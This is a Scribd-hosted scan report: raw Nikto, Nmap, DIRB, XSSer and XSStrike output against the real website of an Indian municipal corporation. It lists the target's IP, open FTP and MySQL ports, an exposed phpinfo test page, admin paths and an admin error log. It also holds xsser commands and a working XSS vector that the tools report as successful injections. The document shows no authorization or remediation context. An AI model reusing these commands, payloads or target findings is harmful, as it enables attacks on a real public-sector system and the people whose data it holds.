Scribd Logo
Importer

Bienvenue sur Scribd !

  • Report

    Transféré par

    SWQ LYCAN
    31 vues8 pages
    The summary analyzes the security of a website www.pcmcindia.gov.in. It finds that the website is running an outdated version of Apache 2.2.15, has cookies without secure and httponly flags, and is missing security headers. The scans also detect some potential vulnerabilities like PHP scripts revealing versions and TRACE method enabled.

    Description originale:

    Titre original

    report

    Copyright

    © © All Rights Reserved

    Formats disponibles

    TXT, PDF, TXT ou lisez en ligne sur Scribd

    Avez-vous trouvé ce document utile ?

    Ce contenu est-il inapproprié ?

    Signaler ce document
    The summary analyzes the security of a website www.pcmcindia.gov.in. It finds that the website is running an outdated version of Apache 2.2.15, has cookies without secure and httponly flags, and is missing security headers. The scans also detect some potential vulnerabilities like PHP scripts revealing versions and TRACE method enabled.

    Droits d'auteur :

    © All Rights Reserved
    Téléchargez comme TXT, PDF, TXT ou lisez en ligne sur Scribd
    Signaler comme contenu inapproprié
    31 vues8 pages

    Report

    Transféré par

    SWQ LYCAN
    The summary analyzes the security of a website www.pcmcindia.gov.in. It finds that the website is running an outdated version of Apache 2.2.15, has cookies without secure and httponly flags, and is missing security headers. The scans also detect some potential vulnerabilities like PHP scripts revealing versions and TRACE method enabled.

    Droits d'auteur :

    © All Rights Reserved
    Téléchargez comme TXT, PDF, TXT ou lisez en ligne sur Scribd
    Signaler comme contenu inapproprié
    sur 8

    - Nikto v2.1.

    6
    ---------------------------------------------------------------------------
    + Target IP: 202.38.172.174
    + Target Hostname: www.pcmcindia.gov.in
    + Target Port: 443
    ---------------------------------------------------------------------------
    + SSL Info: Subject: /C=IN/ST=Maharashtra/L=Pune/O=Pimpri Chinchwad
    Municipal Corporation/OU=Government Organisation IT/CN=www.pcmcindia.gov.in
    Ciphers: ECDHE-RSA-AES256-GCM-SHA384
    Issuer: /C=US/O=DigiCert Inc/CN=DigiCert SHA2 Secure Server CA
    + Start Time: 2020-01-30 10:36:19 (GMT5.5)
    ---------------------------------------------------------------------------
    + Server: Apache/2.2.15 (CentOS)
    + Cookie PHPSESSID created without the secure flag
    + Cookie PHPSESSID created without the httponly flag
    + Retrieved x-powered-by header: PHP/5.4.33
    + The anti-clickjacking X-Frame-Options header is not present.
    + The X-XSS-Protection header is not defined. This header can hint to the user
    agent to protect against some forms of XSS
    + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
    + The site uses SSL and Expect-CT header is not present.
    + The X-Content-Type-Options header is not set. This could allow the user agent to
    render the content of the site in a different fashion to the MIME type
    + No CGI Directories found (use '-C all' to force check all possible dirs)
    + Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.37). Apache
    2.2.34 is the EOL for the 2.x branch.
    + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
    + Web Server returns a valid response with junk HTTP methods, this may cause false
    positives.
    + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
    + OSVDB-12184: /marathi/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals
    potentially sensitive information via certain HTTP requests that contain specific
    QUERY strings.
    + OSVDB-12184: /marathi/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals
    potentially sensitive information via certain HTTP requests that contain specific
    QUERY strings.
    + OSVDB-12184: /marathi/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals
    potentially sensitive information via certain HTTP requests that contain specific
    QUERY strings.
    + ERROR: Error limit (20) reached for host, giving up. Last error: opening stream:
    can't connect: : Invalid argument
    + Scan terminated: 20 error(s) and 15 item(s) reported on remote host
    + End Time: 2020-01-30 10:44:56 (GMT5.5) (517 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested

    ---------------------------------------------------------------------------
    + Target IP: 202.38.172.174
    + Target Hostname: www.pcmcindia.gov.in
    + Target Port: 443
    ---------------------------------------------------------------------------
    + SSL Info: Subject: /C=IN/ST=Maharashtra/L=Pune/O=Pimpri Chinchwad
    Municipal Corporation/OU=Government Organisation IT/CN=www.pcmcindia.gov.in
    Ciphers: ECDHE-RSA-AES256-GCM-SHA384
    Issuer: /C=US/O=DigiCert Inc/CN=DigiCert SHA2 Secure Server CA
    + Start Time: 2020-02-03 17:09:34 (GMT5.5)
    ---------------------------------------------------------------------------
    + Server: Apache/2.2.15 (CentOS)
    + The anti-clickjacking X-Frame-Options header is not present.
    + The X-XSS-Protection header is not defined. This header can hint to the user
    agent to protect against some forms of XSS
    + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
    + The site uses SSL and Expect-CT header is not present.
    + The X-Content-Type-Options header is not set. This could allow the user agent to
    render the content of the site in a different fashion to the MIME type
    + Cookie PHPSESSID created without the secure flag
    + Cookie PHPSESSID created without the httponly flag
    + Retrieved x-powered-by header: PHP/5.4.33
    + Multiple index files found: /index.php, /index.html
    + Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.37). Apache
    2.2.34 is the EOL for the 2.x branch.
    + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
    + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
    + /test.php: Output from the phpinfo() function was found.
    + OSVDB-3233: /test.php: PHP is installed, and a test script which runs phpinfo()
    was found. This gives a lot of system information.
    + /administration.php: Admin login page/section found.
    + OSVDB-3092: /test.php: This might be interesting...
    + 26591 requests: 1 error(s) and 16 item(s) reported on remote host
    + End Time: 2020-02-03 20:16:02 (GMT5.5) (11188 seconds)
    ---------------------------------------------------------------------------

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-30 12:19 IST


    NSE: Warning: Could not load 'mysql-info.nse': no path to file/directory: mysql-
    info.nse
    NSE: Loaded 150 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 12:19
    Completed NSE at 12:19, 0.00s elapsed
    Initiating NSE at 12:19
    Completed NSE at 12:19, 0.00s elapsed
    Initiating NSE at 12:19
    Completed NSE at 12:19, 0.00s elapsed
    Initiating Ping Scan at 12:19
    Scanning pcmcindia.gov.in (202.38.172.174) [4 ports]
    Completed Ping Scan at 12:19, 0.08s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 12:19
    Completed Parallel DNS resolution of 1 host. at 12:19, 0.11s elapsed
    Initiating SYN Stealth Scan at 12:19
    Scanning pcmcindia.gov.in (202.38.172.174) [1000 ports]
    Discovered open port 443/tcp on 202.38.172.174
    Discovered open port 21/tcp on 202.38.172.174
    Discovered open port 80/tcp on 202.38.172.174
    Discovered open port 111/tcp on 202.38.172.174
    Discovered open port 3306/tcp on 202.38.172.174
    Completed SYN Stealth Scan at 12:20, 3.14s elapsed (1000 total ports)
    Initiating Service scan at 12:20
    Scanning 5 services on pcmcindia.gov.in (202.38.172.174)
    Completed Service scan at 12:20, 12.36s elapsed (5 services on 1 host)
    Initiating OS detection (try #1) against pcmcindia.gov.in (202.38.172.174)
    Retrying OS detection (try #2) against pcmcindia.gov.in (202.38.172.174)
    adjust_timeouts2: packet supposedly had rtt of -1042575 microseconds. Ignoring
    time.
    adjust_timeouts2: packet supposedly had rtt of -1042575 microseconds. Ignoring
    time.
    adjust_timeouts2: packet supposedly had rtt of -947586 microseconds. Ignoring
    time.
    adjust_timeouts2: packet supposedly had rtt of -947586 microseconds. Ignoring
    time.
    adjust_timeouts2: packet supposedly had rtt of -842656 microseconds. Ignoring
    time.
    adjust_timeouts2: packet supposedly had rtt of -842656 microseconds. Ignoring
    time.
    Initiating Traceroute at 12:20
    Completed Traceroute at 12:20, 3.02s elapsed
    Initiating Parallel DNS resolution of 9 hosts. at 12:20
    Completed Parallel DNS resolution of 9 hosts. at 12:20, 0.15s elapsed
    NSE: Script scanning 202.38.172.174.
    Initiating NSE at 12:20
    Segmentation fault

    -----------------
    DIRB v2.22
    By The Dark Raver
    -----------------

    START_TIME: Thu Jan 30 12:23:21 2020


    URL_BASE: https://www.pcmcindia.gov.in/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

    -----------------

    GENERATED WORDS: 4612

    ---- Scanning URL: https://www.pcmcindia.gov.in/ ----


    ==> DIRECTORY: https://www.pcmcindia.gov.in/admin/
    ==> DIRECTORY: https://www.pcmcindia.gov.in/cgi-bin/
    + https://www.pcmcindia.gov.in/cgi-bin/ (CODE:403|SIZE:297)
    ==> DIRECTORY: https://www.pcmcindia.gov.in/clips/
    ==> DIRECTORY: https://www.pcmcindia.gov.in/css/
    ==> DIRECTORY: https://www.pcmcindia.gov.in/fonts/
    ==> DIRECTORY: https://www.pcmcindia.gov.in/images/
    ==> DIRECTORY: https://www.pcmcindia.gov.in/includes/
    + https://www.pcmcindia.gov.in/index.html (CODE:200|SIZE:82)
    + https://www.pcmcindia.gov.in/index.php (CODE:200|SIZE:135664)
    ==> DIRECTORY: https://www.pcmcindia.gov.in/js/
    ==> DIRECTORY: https://www.pcmcindia.gov.in/mailer/
    ==> DIRECTORY: https://www.pcmcindia.gov.in/pdf/
    + https://www.pcmcindia.gov.in/phpmyadmin (CODE:403|SIZE:299)
    + https://www.pcmcindia.gov.in/phpMyAdmin (CODE:403|SIZE:299)
    + https://www.pcmcindia.gov.in/usage (CODE:403|SIZE:294)
    ==> DIRECTORY: https://www.pcmcindia.gov.in/zip/

    ---- Entering directory: https://www.pcmcindia.gov.in/admin/ ----


    ==> DIRECTORY: https://www.pcmcindia.gov.in/admin/admin/
    ==> DIRECTORY: https://www.pcmcindia.gov.in/admin/ajax/
    ==> DIRECTORY: https://www.pcmcindia.gov.in/admin/calendar/
    ==> DIRECTORY: https://www.pcmcindia.gov.in/admin/css/
    + https://www.pcmcindia.gov.in/admin/error_log (CODE:200|SIZE:120176)
    ==> DIRECTORY: https://www.pcmcindia.gov.in/admin/fckeditor/
    ==> DIRECTORY: https://www.pcmcindia.gov.in/admin/images/
    ==> DIRECTORY: https://www.pcmcindia.gov.in/admin/includes/
    + https://www.pcmcindia.gov.in/admin/index.php (CODE:302|SIZE:0)
    ==> DIRECTORY: https://www.pcmcindia.gov.in/admin/js/
    ==> DIRECTORY: https://www.pcmcindia.gov.in/admin/mailer/

    ---- Entering directory: https://www.pcmcindia.gov.in/cgi-bin/ ----


    ---- Entering directory: https://www.pcmcindia.gov.in/clips/ ----

    ---- Entering directory: https://www.pcmcindia.gov.in/css/ ----


    ==> DIRECTORY: https://www.pcmcindia.gov.in/css/images/

    ---- Entering directory: https://www.pcmcindia.gov.in/fonts/ ----

    ---- Entering directory: https://www.pcmcindia.gov.in/images/ ----


    ==> DIRECTORY: https://www.pcmcindia.gov.in/images/banner/
    ==> DIRECTORY: https://www.pcmcindia.gov.in/images/Business/
    ==> DIRECTORY: https://www.pcmcindia.gov.in/images/icon/
    ==> DIRECTORY: https://www.pcmcindia.gov.in/images/images/

    ---- Entering directory: https://www.pcmcindia.gov.in/includes/ ----

    ---- Entering directory: https://www.pcmcindia.gov.in/js/ ----

    ---- Entering directory: https://www.pcmcindia.gov.in/mailer/ ----


    ==> DIRECTORY: https://www.pcmcindia.gov.in/mailer/images/
    + https://www.pcmcindia.gov.in/mailer/index.html (CODE:200|SIZE:24869)

    ---- Entering directory: https://www.pcmcindia.gov.in/pdf/ ----


    ==> DIRECTORY: https://www.pcmcindia.gov.in/pdf/_notes/
    ==> DIRECTORY: https://www.pcmcindia.gov.in/pdf/education/
    ==> DIRECTORY: https://www.pcmcindia.gov.in/pdf/jobs/
    ==> DIRECTORY: https://www.pcmcindia.gov.in/pdf/stores/

    ---- Entering directory: https://www.pcmcindia.gov.in/zip/ ----

    ---- Entering directory: https://www.pcmcindia.gov.in/admin/admin/ ----

    ---- Entering directory: https://www.pcmcindia.gov.in/admin/ajax/ ----

    ---- Entering directory: https://www.pcmcindia.gov.in/admin/calendar/ ----


    ==> DIRECTORY: https://www.pcmcindia.gov.in/admin/calendar/classes/
    ==> DIRECTORY: https://www.pcmcindia.gov.in/admin/calendar/images/

    ---- Entering directory: https://www.pcmcindia.gov.in/admin/css/ ----

    ---- Entering directory: https://www.pcmcindia.gov.in/admin/fckeditor/ ----


    ==> DIRECTORY: https://www.pcmcindia.gov.in/admin/fckeditor/editor/
    ==> DIRECTORY: https://www.pcmcindia.gov.in/admin/fckeditor/images/

    ---- Entering directory: https://www.pcmcindia.gov.in/admin/images/ ----


    xsser -u 'https://www.pcmcindia.gov.in' -g '/test.php?Id=200' --Xsa
    ===========================================================================

    XSSer v1.8[2]: "The Hiv3!" - (https://xsser.03c8.net) - 2010/2019 -> by psy

    ===========================================================================
    Testing [XSS from URL]...
    ===========================================================================
    ===========================================================================
    [*] Test: [ 1/1 ] <-> 2020-02-03 18:56:37.939006
    ===========================================================================

    [+] Target:

    [ https://www.pcmcindia.gov.in ]

    ---------------------------------------------

    [!] Hashing:

    [ 6cea8d3cd00ff3e2fba23b984863299b ] : [ XSA ]

    ---------------------------------------------

    [*] Trying: + ['XSA']

    https://www.pcmcindia.gov.in/test.php?Id=200

    =============================================
    [*] Injection(s) Results:
    =============================================

    [ FOUND! ] -> [ 6cea8d3cd00ff3e2fba23b984863299b ] : [ XSA ] -> [ ">PAYLOAD ]

    ==================================================
    Mosquito(es) landed!
    ==================================================

    ===========================================================================
    [*] Final Results:
    ===========================================================================

    - Injections: 1
    - Failed: 0
    - Successful: 1
    - Accur: 100.0 %

    ===========================================================================
    [*] List of XSS injections:
    ===========================================================================

    You have found: [ 1 ] possible (without --reverse-check) XSS vector(s)!

    ---------------------

    [+] Target: https://www.pcmcindia.gov.in | /test.php?Id=200


    [+] Vector: [ XSA ]
    [!] Method: User-Agent Injection
    [*] Hash: 6cea8d3cd00ff3e2fba23b984863299b
    [*] Payload: ">6cea8d3cd00ff3e2fba23b984863299b
    [!] Status: XSS FOUND!
    --------------------------------------------------

    xsser -u 'https://www.pcmcindia.gov.in' -g '/test.php?Id=200' --Coo


    ===========================================================================

    XSSer v1.8[2]: "The Hiv3!" - (https://xsser.03c8.net) - 2010/2019 -> by psy

    ===========================================================================
    Testing [XSS from URL]...
    ===========================================================================
    ===========================================================================
    [*] Test: [ 1/1 ] <-> 2020-02-03 18:54:30.602553
    ===========================================================================

    [+] Target:

    [ https://www.pcmcindia.gov.in ]

    ---------------------------------------------

    [!] Hashing:

    [ 35fdd4c6403ccd2a066a52a1ff173a27 ] : [ COO ]

    ---------------------------------------------

    [*] Trying: + ['COO']

    https://www.pcmcindia.gov.in/test.php?Id=200

    =============================================
    [*] Injection(s) Results:
    =============================================

    [ FOUND! ] -> [ 35fdd4c6403ccd2a066a52a1ff173a27 ] : [ COO ] -> [ ">PAYLOAD ]

    ==================================================
    Mosquito(es) landed!
    ==================================================

    ===========================================================================
    [*] Final Results:
    ===========================================================================

    - Injections: 1
    - Failed: 0
    - Successful: 1
    - Accur: 100.0 %

    ===========================================================================
    [*] List of XSS injections:
    ===========================================================================

    You have found: [ 1 ] possible (without --reverse-check) XSS vector(s)!


    ---------------------

    [+] Target: https://www.pcmcindia.gov.in | /test.php?Id=200


    [+] Vector: [ COO ]
    [!] Method: Cookie Injection
    [*] Hash: 35fdd4c6403ccd2a066a52a1ff173a27
    [*] Payload: ">35fdd4c6403ccd2a066a52a1ff173a27
    [!] Status: XSS FOUND!
    --------------------------------------------------

    https://www.pcmcindia.gov.in/marathi/news-detail.php?Id=200

    XSStrike v3.1.4

    [~] Crawling the target


    ------------------------------------------------------------
    [+] Vulnerable component: jquery v1.12.4
    [!] Component location:
    https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js
    [!] Total vulnerabilities: 3
    [!] Summary: parseHTML() executes scripts in event handlers
    [!] Severity: medium
    [!] CVE: CVE-2015-9251
    [!] Summary: jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other
    products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype
    pollution
    [!] Severity: low
    [!] CVE: CVE-2019-11358
    [!] Summary: 3rd party CORS request may execute
    [!] Severity: medium
    [!] CVE: CVE-2015-9251
    ------------------------------------------------------------

    XSStrike v3.1.4

    [~] Crawling the target


    [++] Vulnerable webpage: https://www.pcmcindia.gov.in/test.php
    [++] Vector for : <a%09oNMoUSeOVeR%09=%09a=prompt,a()//v3dm0s
    !] Progress: 3/3

    XSStrike v3.1.4

    [~] Crawling the target


    ------------------------------------------------------------
    [+] Vulnerable component: jquery v1.12.4
    [!] Component location:
    https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js
    [!] Total vulnerabilities: 3
    [!] Summary: parseHTML() executes scripts in event handlers
    [!] Severity: medium
    [!] CVE: CVE-2015-9251
    [!] Summary: 3rd party CORS request may execute
    [!] Severity: medium
    [!] CVE: CVE-2015-9251
    [!] Summary: jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other
    products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype
    pollution
    [!] Severity: low
    [!] CVE: CVE-2019-11358
    ------------------------------------------------------------
    [+] Potentially vulnerable objects found at https://www.pcmcindia.gov.in/index.php
    ------------------------------------------------------------
    ------------------------------------------------------------
    on.href.lastIndexOf("/")+1);

    Vous aimerez peut-être aussi